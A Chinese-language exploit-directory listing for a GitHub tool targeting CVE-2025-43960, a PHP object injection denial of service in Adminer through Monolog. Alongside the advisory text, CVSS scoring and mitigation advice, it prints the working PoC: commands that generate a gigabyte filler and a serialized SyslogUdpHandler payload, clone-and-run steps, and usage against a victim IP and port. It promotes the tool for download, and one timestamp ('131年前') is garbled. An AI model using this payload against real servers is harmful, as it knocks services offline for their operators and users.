Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-43960 — 针对Adminer <4.8.1的PHP对象注入利用,通过Monolog,使用精心构造的序列化负载导致拒绝服务。包含PoC、CVSS评分和缓解指南。 | Kitploit
工具/GitHubGitHub/far00t01/cve-2025-43960
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

针对Adminer <4.8.1的PHP对象注入利用,通过Monolog,使用精心构造的序列化负载导致拒绝服务。包含PoC、CVSS评分和缓解指南。

查看仓库
131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-43960 - Adminer < 4.8.1 中通过 Monolog 的 PHP 对象注入 - 拒绝服务 (DoS)

经过数月的等待未收到 MITRE 的回应,我获得了 CVE-2025-43960,该漏洞为针对 Adminer 服务(<4.8.1)的 PHP 对象注入攻击,通过内存操纵导致拒绝服务(DoS)。

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

摘要

此漏洞允许远程非认证攻击者利用使用了 Monolog 的 Adminer 4.8.1 实例,通过 PHP 对象注入造成拒绝服务(DoS)。攻击向量无需认证或用户交互,因此是一个高严重性问题(CVSS 7.5),在某些共享环境中可能升级至 8.6。

建议描述

当使用 Monolog 进行日志记录时,Adminer 4.8.1 存在一个拒绝服务(内存消耗)漏洞,攻击者可利用精心构造的序列化载荷(例如带有 s:1000000000 字符串的载荷)触发该漏洞,即 PHP 对象注入问题。该漏洞影响使用 Monolog 进行日志记录的 Adminer 实例,未受信任的用户输入在未经适当验证的情况下被反序列化。通过发送一个大型反序列化对象,攻击者可强制造成高内存消耗,使 Adminer 界面无响应,从而导致服务器范围的拒绝服务。

  • 虽然服务器可能在几分钟后恢复,但多个并发请求可导致完全崩溃,需要手动干预才能恢复服务。

CVSS 分数 v3.1

基础分数: 7.5(高)
向量: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

关于特定部署的说明:

如果崩溃 Adminer 同时影响其他服务/租户(例如容器或共享进程),则可能应用 范围:已变更:

  • 向量: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • 分数: 8.6(高)

附加信息

潜在的缓解措施

  • 避免在 Adminer 和 Monolog 中对未受信任的数据使用 unserialize()。
  • 在 PHP 中强制设置内存限制(memory_limit)以防止资源过度消耗。
  • 在 unserialize() 中使用 allowed_classes 限制未经授权类的反序列化。

产品供应商

  • Adminer

受影响的产品代码库

  • Adminer < 4.8.1(测试时的最新稳定版本)

受影响的组件

  • Adminer 中的 Monolog 集成

有问题的特性

  • 通过 unserialize() 的 PHP 对象注入

可能受影响的区域

  • 任何使用了基于 Monolog 日志记录的 Adminer 实例

概念验证(PoC)

生成载荷:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

影响:

  • 服务器进入加载状态,Adminer 不可访问。
  • 连接活动时,前端完全消失。
  • 攻击停止后,服务器数分钟后恢复,除非使用多台机器(DDoS 场景)。

安装要求

  • Python:确保已安装 Python 3.x。可通过在终端运行 python3 --version 检查。

Python 依赖项

  • Flask:用于运行提供载荷的本地 HTTP 服务器。
  • requests:用于在利用过程中与目标应用程序交互。

安装

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

利用方法:

root@kitploit:~
python3 cve-2025-43960.py 

用法: cve-2025-43960.py <监听IP> <监听端口> <受害者IP:端口>
示例: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

参考资料

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

发现者

Fabian Rosales (@far00t01) Medium

下载工具